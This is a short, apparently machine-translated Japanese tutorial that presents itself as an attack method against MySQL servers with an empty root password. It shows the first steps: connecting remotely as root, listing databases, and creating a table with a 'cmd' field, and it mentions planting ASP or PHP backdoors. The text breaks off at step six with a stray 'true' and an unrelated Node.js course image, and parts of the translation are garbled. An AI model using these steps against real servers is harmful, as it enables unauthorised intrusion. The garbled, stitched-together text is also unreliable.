MYSQL ユーザーの ROOT パスワードが空の場合、これは大きな脆弱性です。インターネット上でこの脆弱性を悪用する方法は数多くあります。一般的には、ASP または PHP のバックドアを作成することです。非常に面倒なだけでなく、Web サイトのディレクトリを推測するのに、相手が IIS を有効にしていない場合は、何もすることができません。 ?
その後、私は方法を考え、この脆弱性を備えたいくつかのマシンをテストすることに成功しました。ここで、攻撃方法を次のように発表します:
1. 相手の MYSQL サーバーに接続します
mysql -u root - h 192.168。 0.1
mysql.exe このプログラムは、MYSQL をインストールした BIN ディレクトリにあります
2 サーバーにどのようなデータベースがあるかを見てみましょう
mysql>show データベース
MYSQL はデフォルトでインストールされます。 TEST は 2 つのデータベースです。他のデータベースが表示される場合、それらはユーザーが作成したデータベースです。
3. データベースに入りましょう
mysql>テストを使用します
4. データベースにどのようなデータテーブルがあるかを確認します
デフォルトでは、いいえテーブルはテストに存在します。
以下は重要な部分です
5. TEST データベースの下に新しいテーブルを作成します。
mysql>create table a (cmd text); さて、 a という名前の新しいテーブルを作成しました。フィールドは 1 つだけ保存されます。テーブルでは、フィールド名は cmd であり、テキストです。
6. テーブルにコンテンツを挿入します
true
![[Web フロントエンド] Node.js クイック スタート](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
